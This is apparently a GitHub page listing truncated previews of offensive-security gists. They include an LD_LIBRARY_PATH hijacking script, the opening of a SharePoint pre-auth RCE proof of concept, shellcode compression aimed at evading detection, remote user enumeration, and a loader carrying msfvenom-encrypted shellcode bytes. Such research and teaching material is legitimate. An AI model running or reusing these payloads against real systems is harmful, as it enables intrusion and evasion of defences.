Skip to content

Instantly share code, notes, and snippets.

View darkr4y's full-sized avatar
🎯
Self-Introspection

D@rkR4y. darkr4y

🎯
Self-Introspection
556 followers · 226 following
  • Pand0ra
  • Origin
View GitHub Profile
@daniruiz
daniruiz / ld_library_path_exploit.sh
Last active February 15, 2024 03:42
Script that automatically generates malicious library and exploits binary through LD_LIBRARY_PATH Hijacking. The script generates the list of missing symbols, based on the specified library, and creates the version-script map file to avoid error messages when loading the new created malicious library.
#!/bin/sh
# ./ld_path_exploit.sh /usr/lib/libgpg-error.so.0 top
TARGET_LIB=$1
MISSING_SYMBOLS="$(readelf -s --wide ${TARGET_LIB} \
| grep 'FUNC\|OBJECT' \
| grep -v 'UND\|ABS' \
| awk '{print $8}' \
@WKL-Sec
WKL-Sec / DLL_Sideloading_Protection_Example.cpp
Created January 17, 2024 17:00
This C++ code example is part of the White Knight Labs Offensive Development Course materials. A straightforward C++ code snippet demonstrating how to prevent DLL sideloading by validating the calling executable. It uses a whitelist approach to ensure only specified executables can load the DLL.
#include <windows.h>
#include <string>
#include <vector>
#include <algorithm>
// White Knight Labs - Offensive Development Course
// DLL Guardrails Example
// This function extracts the file name from a given path
// It is used later to determine the executable name loading the DLL.
@odzhan
odzhan / rdp_pack.cpp
Last active March 27, 2024 17:27
Compression using RDP API
/**
Compression using undocumented API in rdpbase.dll
RDPCompressEx supports four algorithms : MPPC-8K, MPPC-64K, NCRUSH and XCRUSH.
This code supports all except NCRUSH.
The MPPC compression ratio is very similar to LZSS, so this could be quite useful for shellcode trying to evade detection.
NCRUSH compression appears to work but fails for decompression.
@laixintao
laixintao / decent_request.py
Last active February 20, 2024 12:05
Send HTTP requests using python-requests with timeout, tcp reuse(session) and retry.
from requests.adapters import HTTPAdapter, Retry
from requests import Session
retries = Retry(
total=5, backoff_factor=1, status_forcelist=[502, 503, 504]
)
session = Session() # reuse tcp connection
session.mount("http://", HTTPAdapter(max_retries=retries))
session.mount("https://", HTTPAdapter(max_retries=retries))
@testanull
testanull / SharePwn_public.py
Created December 15, 2023 07:31
SharePoint Pre-Auth Code Injection RCE chain CVE-2023-29357 & CVE-2023-24955 PoC
# -*- coding: utf-8 -*-
import hashlib
import base64
import requests, string, struct, uuid, random, re
import sys
from collections import OrderedDict
from sys import version
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# too lazy to deal with string <-> bytes confusion in python3 so forget it ¯\_(ツ)_/¯
@Brandon7CC
Brandon7CC / es_coreanalytics_event_subs.js
Last active February 14, 2024 02:13
Hook the CoreAnalytics sendEvent function call made by endpointsecurityd to uncover event subscriptions.
/*
Author: Brandon Dalton (Red Canary Threat Research)
Date: 2023-12-07
Summary: This script attempts to instrument the `sendEvent:event:` method of the ESCoreAnalytics class.
- Download this script
- Target: You're targeting `endpointsecurityd`, so grab its PID: `sudo launchctl list | grep endpointsecurityd`
- To run: `sudo frida -p $PID -l es_coreanalytics_event_subs.js`
*/
const eventTypeMapping = {
@awakecoding
awakecoding / Install-DbgHelp.ps1
Created December 12, 2023 03:27
function Install-DbgHelp {
param (
[Parameter(Mandatory=$true, Position=0)]
[string] $DbgHelpBaseDir,
[Parameter()]
[string[]] $DbgHelpFiles = @('dbghelp.dll','symsrv.dll','srcsrv.dll'),
[Parameter()]
[switch] $Cleanup
@RalphDesmangles
RalphDesmangles / GetLoggedOnUsersRegistry.cs
Last active February 15, 2024 13:22
Enumerating Logged-On Users on Remote Systems via RemoteRegistry / Winreg Named Pipe
using System;
using System.Collections.Generic;
using System.Security.Principal;
using System.Text.RegularExpressions;
/*
PoC To enumerate logged on users on a remote system using the winreg named pipe.
Based on the work of Rohan Vazarkar (@cptjesus) and Antonio Cocomazzi (@splinter_code).
RemoteRegistry service must be enabled (default) for this to work.
@dadevel
dadevel / byorwx.cpp
Last active May 28, 2024 10:59
Bring your own RWX section
#include <cstdint>
// x86_64-w64-mingw32-g++ -lstdc++ -static -O3 -s -DPAYLOAD_SIZE=276 ./byorwx.cpp ./section.S -o ./byorwx.exe
// msfvenom -p windows/x64/exec -f c CMD=calc.exe --encrypt xor --encrypt-key abcdef
unsigned char buf[] =
"\x9d\x2a\xe0\x80\x95\x8e\xa1\x62\x63\x64\x24\x37\x20\x32"
"\x31\x35\x33\x2e\x50\xb0\x06\x2c\xee\x34\x01\x2a\xe8\x36"
"\x7d\x2e\xea\x30\x43\x2c\xee\x14\x31\x2a\x6c\xd3\x2f\x2c"
"\x2c\x53\xaa\x2c\x54\xa6\xcd\x5e\x02\x18\x67\x4a\x41\x23"
@timClicks
timClicks / lol.c
Last active February 16, 2024 08:14
How many bugs can you spot?
// By [Colin Finck] and used by the [Comprehensive Rust] course,
// developed by the Android team at Google.
//
// This code compiles warning-free at the default warning level,
// even in the latest GCC version (13.2 as of writing).
//
// [Colin Finck]: https://colinfinck.de/Master_Thesis_Slides.pdf
// [Comprehensive Rust]: https://github.com/google/comprehensive-rust
#include <stdio.h>